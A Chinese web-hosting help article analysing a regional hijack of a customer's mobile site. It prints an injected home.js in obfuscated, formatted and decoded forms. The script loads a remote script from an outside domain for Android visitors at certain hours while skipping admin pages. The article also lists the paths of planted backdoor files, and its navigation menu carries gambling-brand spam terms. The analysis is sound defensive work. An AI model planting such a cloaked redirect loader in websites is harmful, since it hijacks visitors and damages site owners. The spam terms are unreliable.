861、371、中国信息港、第一万维网、59互联,第一主机,一站式综合登陆平台
备案流程
付款方式
登录
注册
4006371371
Toggle navigation
0
首页
w88体育注册
w88体育购买
w88体育注册
批量注册
w88体育管理
独立管理平台
w88体育安全锁
New
w88体育信息
w88体育价格
Whois查询
w88体育优惠
w88澳门官网
多线机房
郑州多线
浙江双线
电信机房
江苏电信
江西电信
联通机房
河南联通(中原数据基地)
海外机房
香港机房
美国机房
韩国机房
高防大带宽
高防
大带宽
优惠信息
w88体育
多线机房
郑州多线
浙江双线
电信机房
江苏电信
江西电信
浙江电信
联通机房
河南联通(中原数据基地)
云主机
国际贸易专用主机
成品网站
优惠信息
VPS主机
优惠信息
易方VPS
云主机
易方云主机
云主机基础型
云主机豪华型
了解云主机
云主机相关
优惠信息
智能建站
优惠活动
建站产品
企业营销版
网店营销版
模板展示
建站服务
功能配置
建站案例
建站帮助
帮助中心
解决方案
企业邮箱
标准版
企业版
SSL证书
在线购买
优惠活动
新闻中心
新闻中心
新闻中心
|- w88体育新闻
帮助中心
帮助中心
|- w88体育帮助
|- 帮助
|- VPS/云主机 帮助
|- 服务器帮助
|- 用户帮助
|- SSL帮助
|- 企业邮局
最近流行的手机站区域性劫持的分析及处理!
分类
服务器帮助
阅读1228 次
发布日期 2018-11-01
本次接到的客户遇到的问题是他的手机站总是跳转到一个垃圾推广网站页面上,电脑端的正常,查了好久也没发现在哪儿,就请我来帮忙一起分析并处理一下.
首先我们先用谷歌浏览器模拟手机访问,同时利用抓包工具分析一下他的详细访问及源码,如下:
然后去服务器上查看一下他站点目录内的js有没有最近修改过的痕迹,然后就发现了home.js最近被改动过,如下:
现在我们来解密一下这个home.js文件,还原下看看他的详细操作,如下:
【原加密代码】
var __encode ='sojson.com', _0xb483=["\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(window);var _0x709e=["\x67\x65\x74\x48\x6F\x75\x72\x73","\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x3A","\x73\x70\x6C\x69\x74","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x73","\x68","\x64","\x28\x5E\x7C\x20\x29","\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29","\x6D\x61\x74\x63\x68","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E","\x61\x6E\x64\x72\x6F\x69\x64","\x69\x6E\x64\x65\x78\x4F\x66","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x69\x50\x68\x6F\x6E\x65","\x69\x50\x61\x64","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x61\x6E\x7A\x68\x61\x6E\x77\x61\x70","\x68\x36","\x30\x3A\x30\x30","\x38\x3A\x33\x30","\x31\x35\x3A\x30\x30","\x32\x33\x3A\x35\x39","\x61\x6A\x61\x78","\x3C\x73\x63\x72\x69\x70\x74","\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x77\x77\x77\x2E\x62\x6E\x67\x72\x68\x6B\x2E\x63\x6F\x6D\x2F","\x31\x2E\x6A\x73\x22\x3E\x3C","\x2F\x73\x63\x72\x69\x70","\x74\x3E","\x77\x72\x69\x74\x65","\x31","\x31\x3A\x33\x30","\x36\x3A\x35\x39","\x64\x32\x34"];function checkTime(_0xf217x2){var _0xf217x3= new Date();var _0xf217x4=parseInt(_0xf217x3[_0x709e[0]]())* 60+ parseInt(_0xf217x3[_0x709e[1]]());var _0xf217x5=_0xf217x2[0][_0x709e[3]](_0x709e[2]);var _0xf217x6=_0xf217x2[1][_0x709e[3]](_0x709e[2]);var _0xf217x7=parseInt(_0xf217x5[0])* 60+ parseInt(_0xf217x5[1]);var _0xf217x8=parseInt(_0xf217x6[0])* 60+ parseInt(_0xf217x6[1]);if(_0xf217x4>= _0xf217x7&& _0xf217x4<= _0xf217x8){return true}else {return false}}function randomNum(_0xf217xa,_0xf217xb){switch(arguments[_0x709e[5]]){case 1:return parseInt(Math[_0x709e[4]]()* _0xf217xa+ 1,10);break;case 2:return parseInt(Math[_0x709e[4]]()* (_0xf217xb- _0xf217xa+ 1)+ _0xf217xa,10);break;default:return 0;break}}function setCookie(_0xf217xd,_0xf217xe,_0xf217xf){var _0xf217x10=getsec(_0xf217xf);var _0xf217x11= new Date();_0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]()+ _0xf217x10* 1);document[_0x709e[8]]= _0xf217xd+ _0x709e[9]+ escape(_0xf217xe)+ _0x709e[10]+ _0xf217x11[_0x709e[11]]()}function getsec(_0xf217x13){var _0xf217x14=_0xf217x13[_0x709e[12]](1,_0xf217x13[_0x709e[5]])* 1;var _0xf217x15=_0xf217x13[_0x709e[12]](0,1);if(_0xf217x15== _0x709e[13]){return _0xf217x14* 1000}else {if(_0xf217x15== _0x709e[14]){return _0xf217x14* 60* 60* 1000}else {if(_0xf217x15== _0x709e[15]){return _0xf217x14* 24* 60* 60* 1000}}}}function getCookie(_0xf217xd){var _0xf217x17,_0xf217x18= new RegExp(_0x709e[16]+ _0xf217xd+ _0x709e[17]);if(_0xf217x17= document[_0x709e[8]][_0x709e[18]](_0xf217x18)){return unescape(_0xf217x17[2])}else {return null}}var browser={versions:function(){var _0xf217x1a=navigator[_0x709e[19]],_0xf217x1b=navigator[_0x709e[20]];return {android:_0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21])> -1,iPhone:_0xf217x1a[_0x709e[22]](_0x709e[24])> -1,iPad:_0xf217x1a[_0x709e[22]](_0x709e[25])> -1}}()};var xxx=randomNum(1,2);var isadmin=(window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i)!= null;if(!isadmin){var isiPad=navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i)!= null;if(isiPad){if(getCookie(_0x709e[28])){var hanzhanwap=parseInt(getCookie(_0x709e[28]))+ 1;setCookie(_0x709e[28],hanzhanwap,_0x709e[29]);if(parseInt(getCookie(_0x709e[28]))<= 6){if(checkTime([_0x709e[30],_0x709e[31]])|| checkTime([_0x709e[32],_0x709e[33]])){if(xxx== 1){$[_0x709e[34]]= 1;document[_0x709e[40]](_0x709e[35]+ _0x709e[36]+ _0x709e[37]+ _0x709e[38]+ _0x709e[39])}}}}else {setCookie(_0x709e[28],_0x709e[41],_0x709e[29]);if(checkTime([_0x709e[42],_0x709e[43]])){if(xxx== 1){document[_0x709e[40]](_0x709e[35]+ _0x709e[36]+ _0x709e[37]+ _0x709e[38]+ _0x709e[39])}}}}}else {setCookie(_0x709e[28],888,_0x709e[44])}
复制代码
【格式化后】
var __encode = 'sojson.com',
_0xb483 = ["\x5F\x64\x65\x63\x6F\x64\x65", "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];
(function(_0xd642x1) {
_0xd642x1[_0xb483[0]] = _0xb483[1]
})(window);
var _0x709e = ["\x67\x65\x74\x48\x6F\x75\x72\x73", "\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73", "\x3A", "\x73\x70\x6C\x69\x74", "\x72\x61\x6E\x64\x6F\x6D", "\x6C\x65\x6E\x67\x74\x68", "\x67\x65\x74\x54\x69\x6D\x65", "\x73\x65\x74\x54\x69\x6D\x65", "\x63\x6F\x6F\x6B\x69\x65", "\x3D", "\x3B\x65\x78\x70\x69\x72\x65\x73\x3D", "\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", "\x73", "\x68", "\x64", "\x28\x5E\x7C\x20\x29", "\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29", "\x6D\x61\x74\x63\x68", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E", "\x61\x6E\x64\x72\x6F\x69\x64", "\x69\x6E\x64\x65\x78\x4F\x66", "\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65", "\x69\x50\x68\x6F\x6E\x65", "\x69\x50\x61\x64", "\x68\x72\x65\x66", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x61\x6E\x7A\x68\x61\x6E\x77\x61\x70", "\x68\x36", "\x30\x3A\x30\x30", "\x38\x3A\x33\x30", "\x31\x35\x3A\x30\x30", "\x32\x33\x3A\x35\x39", "\x61\x6A\x61\x78", "\x3C\x73\x63\x72\x69\x70\x74", "\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x77\x77\x77\x2E\x62\x6E\x67\x72\x68\x6B\x2E\x63\x6F\x6D\x2F", "\x31\x2E\x6A\x73\x22\x3E\x3C", "\x2F\x73\x63\x72\x69\x70", "\x74\x3E", "\x77\x72\x69\x74\x65", "\x31", "\x31\x3A\x33\x30", "\x36\x3A\x35\x39", "\x64\x32\x34"];
function checkTime(_0xf217x2) {
var _0xf217x3 = new Date();
var _0xf217x4 = parseInt(_0xf217x3[_0x709e[0]]()) * 60 + parseInt(_0xf217x3[_0x709e[1]]());
var _0xf217x5 = _0xf217x2[0][_0x709e[3]](_0x709e[2]);
var _0xf217x6 = _0xf217x2[1][_0x709e[3]](_0x709e[2]);
var _0xf217x7 = parseInt(_0xf217x5[0]) * 60 + parseInt(_0xf217x5[1]);
var _0xf217x8 = parseInt(_0xf217x6[0]) * 60 + parseInt(_0xf217x6[1]);
if (_0xf217x4 >= _0xf217x7 && _0xf217x4 <= _0xf217x8) {
return true
} else {
return false
}
}
function randomNum(_0xf217xa, _0xf217xb) {
switch (arguments[_0x709e[5]]) {
case 1:
return parseInt(Math[_0x709e[4]]() * _0xf217xa + 1, 10);
break;
case 2:
return parseInt(Math[_0x709e[4]]() * (_0xf217xb - _0xf217xa + 1) + _0xf217xa, 10);
break;
default:
return 0;
break
}
}
function setCookie(_0xf217xd, _0xf217xe, _0xf217xf) {
var _0xf217x10 = getsec(_0xf217xf);
var _0xf217x11 = new Date();
_0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]() + _0xf217x10 * 1);
document[_0x709e[8]] = _0xf217xd + _0x709e[9] + escape(_0xf217xe) + _0x709e[10] + _0xf217x11[_0x709e[11]]()
}
function getsec(_0xf217x13) {
var _0xf217x14 = _0xf217x13[_0x709e[12]](1, _0xf217x13[_0x709e[5]]) * 1;
var _0xf217x15 = _0xf217x13[_0x709e[12]](0, 1);
if (_0xf217x15 == _0x709e[13]) {
return _0xf217x14 * 1000
} else {
if (_0xf217x15 == _0x709e[14]) {
return _0xf217x14 * 60 * 60 * 1000
} else {
if (_0xf217x15 == _0x709e[15]) {
return _0xf217x14 * 24 * 60 * 60 * 1000
}
}
}
}
function getCookie(_0xf217xd) {
var _0xf217x17, _0xf217x18 = new RegExp(_0x709e[16] + _0xf217xd + _0x709e[17]);
if (_0xf217x17 = document[_0x709e[8]][_0x709e[18]](_0xf217x18)) {
return unescape(_0xf217x17[2])
} else {
return null
}
}
var browser = {
versions: function() {
var _0xf217x1a = navigator[_0x709e[19]],
_0xf217x1b = navigator[_0x709e[20]];
return {
android: _0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21]) > -1,
iPhone: _0xf217x1a[_0x709e[22]](_0x709e[24]) > -1,
iPad: _0xf217x1a[_0x709e[22]](_0x709e[25]) > -1
}
}()
};
var xxx = randomNum(1, 2);
var isadmin = (window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i) != null;
if (!isadmin) {
var isiPad = navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i) != null;
if (isiPad) {
if (getCookie(_0x709e[28])) {
var hanzhanwap = parseInt(getCookie(_0x709e[28])) + 1;
setCookie(_0x709e[28], hanzhanwap, _0x709e[29]);
if (parseInt(getCookie(_0x709e[28])) <= 6) {
if (checkTime([_0x709e[30], _0x709e[31]]) || checkTime([_0x709e[32], _0x709e[33]])) {
if (xxx == 1) {
$[_0x709e[34]] = 1;
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
} else {
setCookie(_0x709e[28], _0x709e[41], _0x709e[29]);
if (checkTime([_0x709e[42], _0x709e[43]])) {
if (xxx == 1) {
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
}
} else {
setCookie(_0x709e[28], 888, _0x709e[44])
}
复制代码
【解密后代码】
var __encode = 'sojson.com',
_0xb483 = ["_decode", "https://www.sojson.com/javascriptobfuscator.html"];
(function(_0xd642x1) {
_0xd642x1[_0xb483[0]] = _0xb483[1]
})(window);
var _0x709e = ["getHours", "getMinutes", ":", "split", "random", "length", "getTime", "setTime", "cookie", "=", ";expires=", "toGMTString", "substring", "s", "h", "d", "(^| )", "=([^;]*)(;|$)", "match", "userAgent", "appVersion", "android", "indexOf", "toLowerCase", "iPhone", "iPad", "href", "location", "hanzhanwap", "h6", "0:00", "8:30", "15:00", "23:59", "ajax", "<script", " language="javascript" type="text/javascript" src="//www.bngrhk.com/", "1.js"><", "/scrip", "t>", "write", "1", "1:30", "6:59", "d24"];
function checkTime(_0xf217x2) {
var _0xf217x3 = new Date();
var _0xf217x4 = parseInt(_0xf217x3[_0x709e[0]]()) * 60 + parseInt(_0xf217x3[_0x709e[1]]());
var _0xf217x5 = _0xf217x2[0][_0x709e[3]](_0x709e[2]);
var _0xf217x6 = _0xf217x2[1][_0x709e[3]](_0x709e[2]);
var _0xf217x7 = parseInt(_0xf217x5[0]) * 60 + parseInt(_0xf217x5[1]);
var _0xf217x8 = parseInt(_0xf217x6[0]) * 60 + parseInt(_0xf217x6[1]);
if (_0xf217x4 >= _0xf217x7 && _0xf217x4 <= _0xf217x8) {
return true
} else {
return false
}
}
function randomNum(_0xf217xa, _0xf217xb) {
switch (arguments[_0x709e[5]]) {
case 1:
return parseInt(Math[_0x709e[4]]() * _0xf217xa + 1, 10);
break;
case 2:
return parseInt(Math[_0x709e[4]]() * (_0xf217xb - _0xf217xa + 1) + _0xf217xa, 10);
break;
default:
return 0;
break
}
}
function setCookie(_0xf217xd, _0xf217xe, _0xf217xf) {
var _0xf217x10 = getsec(_0xf217xf);
var _0xf217x11 = new Date();
_0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]() + _0xf217x10 * 1);
document[_0x709e[8]] = _0xf217xd + _0x709e[9] + escape(_0xf217xe) + _0x709e[10] + _0xf217x11[_0x709e[11]]()
}
function getsec(_0xf217x13) {
var _0xf217x14 = _0xf217x13[_0x709e[12]](1, _0xf217x13[_0x709e[5]]) * 1;
var _0xf217x15 = _0xf217x13[_0x709e[12]](0, 1);
if (_0xf217x15 == _0x709e[13]) {
return _0xf217x14 * 1000
} else {
if (_0xf217x15 == _0x709e[14]) {
return _0xf217x14 * 60 * 60 * 1000
} else {
if (_0xf217x15 == _0x709e[15]) {
return _0xf217x14 * 24 * 60 * 60 * 1000
}
}
}
}
function getCookie(_0xf217xd) {
var _0xf217x17, _0xf217x18 = new RegExp(_0x709e[16] + _0xf217xd + _0x709e[17]);
if (_0xf217x17 = document[_0x709e[8]][_0x709e[18]](_0xf217x18)) {
return unescape(_0xf217x17[2])
} else {
return null
}
}
var browser = {
versions: function() {
var _0xf217x1a = navigator[_0x709e[19]],
_0xf217x1b = navigator[_0x709e[20]];
return {
android: _0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21]) > -1,
iPhone: _0xf217x1a[_0x709e[22]](_0x709e[24]) > -1,
iPad: _0xf217x1a[_0x709e[22]](_0x709e[25]) > -1
}
}()
};
var xxx = randomNum(1, 2);
var isadmin = (window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i) != null;
if (!isadmin) {
var isiPad = navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i) != null;
if (isiPad) {
if (getCookie(_0x709e[28])) {
var hanzhanwap = parseInt(getCookie(_0x709e[28])) + 1;
setCookie(_0x709e[28], hanzhanwap, _0x709e[29]);
if (parseInt(getCookie(_0x709e[28])) <= 6) {
if (checkTime([_0x709e[30], _0x709e[31]]) || checkTime([_0x709e[32], _0x709e[33]])) {
if (xxx == 1) {
$[_0x709e[34]] = 1;
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
} else {
setCookie(_0x709e[28], _0x709e[41], _0x709e[29]);
if (checkTime([_0x709e[42], _0x709e[43]])) {
if (xxx == 1) {
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
}
} else {
setCookie(_0x709e[28], 888, _0x709e[44])
}
复制代码
看来这位黑客藏的还不够深,一下就被我找到了,哈哈,于是我们就全面检查了一下网站文件和相关日志,终于看到了原因,因为网站内被放了几个后门木马,如下:
\home\wwwroot\m.*.net\Lib232\Home\Common\config.php
\home\wwwroot\www.*.net\Libbeifen\ThinkPHP\Library\Vendor\Boris\config(1).php
\home\wwwroot\www.*.net\Lib232323\ThinkPHP\Mode\Api\ray.php
好了,现在我们再一次抓到了这个小黑客并给客户做好了驱动级防御成功交差,现在可以继续进行下一位客户问题的分析和处理了!